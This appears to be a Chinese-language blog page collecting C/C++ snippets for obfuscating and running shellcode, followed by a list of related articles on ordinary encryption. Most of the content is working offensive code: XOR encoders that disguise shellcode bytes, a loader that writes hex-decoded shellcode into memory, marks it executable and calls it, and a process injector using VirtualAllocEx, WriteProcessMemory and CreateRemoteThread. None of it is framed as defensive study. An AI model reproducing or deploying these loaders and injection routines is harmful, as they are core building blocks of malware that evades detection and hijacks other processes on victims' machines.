异或加密ShellCode:

#include <stdio.h>

#include <Windows.h>

unsigned char buf[] = "\xba\xa9\xb0\x07\x68\xdd\xc3\xd9\x74\x24\xf4\x5e\x31\xc9\xb1";

int main(int argc, char* argv[])

{

	int password = 1025;

	unsigned char enShellCode[500];

	unsigned char deShellCode[500];

	int nLen = sizeof(buf)-1;

	for (int i = 0; i<nLen; i++)

	{

		enShellCode[i] = buf[i] ^ password;

		printf("\\x%x", enShellCode[i]);

	}

	printf("\n");

	for (int i = 0; i<nLen; i++)

	{

		deShellCode[i] = enShellCode[i] ^ password;

		printf("\\x%x", deShellCode[i]);

	}

	system("pause");

	return 0;

}

另一种ShellCode加密方式

#include <stdio.h>

#include <Windows.h>

char ShellCode[] = "\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C";

void encoder(char* input, unsigned char key)

{

	int i = 0, len = 0;

	FILE * fp;

	unsigned char * output;

	len = strlen(input);

	output = (unsigned char *)malloc(len + 1);

	for (i = 0; i<len; i++)

		output[i] = input[i] ^ key;

	fp = fopen("shellcode.raw", "w+");

	fprintf(fp, "\"");

	for (i = 0; i<len; i++)

	{

		fprintf(fp, "\\x%0.2x", output[i]);

		if ((i + 1) % 16 == 0)

			fprintf(fp, "\"\n\"");

	}

	fprintf(fp, "\";");

	fclose(fp);

	// 输出加密后的文件

	for (i = 0; i<len; i++)

	{

		printf("%0.2x ", output[i]);

		if ((i + 1) % 16 == 0)

		{

			printf("\n");

		}

	}

	free(output);

}

int main(int argc,char *argv[])

{

	encoder(ShellCode, 1233);

	system("pause");

	return 0;

}

ShellCode代码执行盒

#include <stdio.h>

#include <Windows.h>

int main(int argc, char *argv[])

{

	unsigned int char_in_hex;

	char *shellcode = argv[1];

	unsigned int iterations = strlen(shellcode);

	unsigned int memory_allocation = strlen(shellcode) / 2;

	for (unsigned int i = 0; i< iterations - 1; i++)

	{

		sscanf(shellcode + 2 * i, "%2X", &char_in_hex);

		shellcode[i] = (char)char_in_hex;

	}

	void *exec = VirtualAlloc(0, memory_allocation, MEM_COMMIT, PAGE_READWRITE);

	memcpy(exec, shellcode, memory_allocation);

	DWORD ignore;

	VirtualProtect(exec, memory_allocation, PAGE_EXECUTE, &ignore);

	(*(void(*)()) exec)();

	return 0;

}

ShellCOde 进程注入

#include <stdio.h>

#include <windows.h>

unsigned char ShellCode[] = "shellcode代码";

BOOL InjectShellCode(int Pid)

{

	HANDLE Handle, remoteThread;

	PVOID remoteBuffer;

	Handle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, Pid);

	remoteBuffer = VirtualAllocEx(Handle, NULL, sizeof(ShellCode), (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);

	WriteProcessMemory(Handle, remoteBuffer, ShellCode, sizeof(ShellCode), NULL);

	remoteThread = CreateRemoteThread(Handle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);

	CloseHandle(Handle);

}

int main(int argc, char *argv[])

{

	InjectShellCode(1024);

	return 0;

}

C/C++ ShellCode 常用加密方式的更多相关文章

  1. iOS代码加密常用加密方式

    iOS代码加密常用加密方式 iOS代码加密常用加密方式,常见的iOS代码加密常用加密方式算法包括MD5加密.AES加密.BASE64加密,三大算法iOS代码加密是如何进行加密的,且看下文 MD5 iO ...

  2. C# 常用加密方式

    using System;using System.Collections.Generic;using System.Text;using System.Security.Cryptography;u ...

  3. Java中常用的加密方式(附多个工具类)

    一.Java常用加密方式 Base64加密算法(编码方式) MD5加密(消息摘要算法,验证信息完整性) 对称加密算法 非对称加密算法 数字签名算法 数字证书 二.分类按加密算法是否需要key被分为两类 ...

  4. java中常用的加密方式

    加密,是以某种特殊的算法改变原有的信息数据,使得未授权的用户即使获得了已加密的信息,但因不知解密的方法,仍然无法了解信息的内容.大体上分为双向加密和单向加密,而双向加密又分为对称加密和非对称加密(有些 ...

  5. 支付对接常用的加密方式介绍以及java代码实现

    京东科技 姚永健 一.术语表: 1.对称算法 加密解密密钥是相同的.这些算法也叫秘密密钥算法或单密钥算法,它要求发送者和接收者在安全通信之前,商定一个密钥.对称算法的安全性依赖于密钥,泄漏密钥就意味着 ...

  6. iOS开发中常用到的加密方式

    1 base64 1.1 简介 Base64编码的思想是是采用64个基本的ASCII码字符对数据进行重新编码.它将需要编码的数据拆分成字节数组.以3个字节为一组.按顺序排列24位数据,再把这24位数据 ...

  7. iOS常用的加密方式--备用

    MD5 iOS代码加密 创建MD5类,代码如下 #import <Foundation/Foundation.h> @interface CJMD5 : NSObject +(NSStri ...

  8. iOS常用的加密方式

    MD5 iOS代码加密 创建MD5类,代码如下 #import <Foundation/Foundation.h> @interface CJMD5 : NSObject +(NSStri ...

  9. PHP的几个常用加密函数(转载 https://jellybool.com/post/php-encrypt-functions)

    PHP的几个常用加密函数 在网站的开发过程中,常常需要对部分数据(如用户密码)进行加密,本文主要介绍PHP的几个常见的加密函数 MD5加密: string md5 ( string $str [, b ...

  10. iOS开发,让数据更安全的几个加密方式

    任何应用的开发中安全都是重中之重,在信息交互异常活跃的现在,信息加密技术显得尤为重要.在app应用开发中,我们需要对应用中的多项数据进行加密处理,从而来保证应用上线后的安全性,给用户一个安全保障.这篇 ...

随机推荐

  1. kill 进程时遇到的一件有意思的事情

    案例现象 一般来讲,我们在 kill 掉一个进程的时候通常有两个选择: 找到进程的 pid 号,然后执行 kill 命令 找到进程的名字,然后执行 pkill 命令 pkill 和 kill 命令都是 ...

  2. C++20 | std::span 陣列、容器的代理人

    在 C++ 裡頭有相當多「容器」.從原生的陣列,到標準庫 STL 的 vector, array, list, queue, map, set, -.有時候我們只是想以檢視的角度去看一個容器,或是其中 ...

  3. Web3初步实践总结

    大家好~Web3是2021年才开始的浪潮,我非常赞同Web3的去中心化的理念,并且最近从Web2全面转向Web3了. 现在与大家分享我的实践的经验,希望对大家有所帮助,谢谢! 目录 为什么要转向Web ...

  4. es6-10

  5. 驾校考试系统 考试模块的 UI效果图

    初始系统界面 判断题 单选题 多选题

  6. Guava缓存工具类封装和使用

    本文为博主原创,未经允许不得转载: Guava是谷歌提供的一款强大的java工具库,里面包含了很多方便且高效的工具,在项目开发中有业务场景需要保存数据到内存当中, 且只需要保存固定时间就可以,该数据只 ...

  7. idea中配置mybatis 映射文件模版及 mybatis plus 自定义sql

    本文为博主原创,未经允许不得转载: mybatis plus 使用过程中已经很大程度提升了我们开发的效率,因为它内部已经对单表的操作进行了完美的封装,但是关联表操作时, 这时就需要自己定义sql,自定 ...

  8. AI毕业设计生成器(基于AI大模型技术开发)

    这是一个辅助生成计算机毕业设计的工具,可以自动完成毕业设计的源码.它基于几百个github上面开源的java和python项目,运用tengsorflow技术,训练出了AI大模型.基本实现了计算机毕业 ...

  9. AI正在改变人类社会 - 内容行业的衰落

    现在的 AI 技术,每天都在进化.我有一种感觉,普通人大概没意识到,它马上就要改变人类社会了. 历史上,这种事一再发生.在你不知不觉中,某些大事件悄悄酝酿,突然就冲击到了你的生活,将你的人生全部打乱, ...

  10. 应用程序使用统计信息 – .NET CORE(C#) WPF界面设计

    应用程序使用统计信息 - .NET CORE(C#) WPF界面设计 首发文章地址:https://dotnet9.com/10546.html 关键功能点 抽屉式菜单 圆形进度条 Demo演示: 1 ...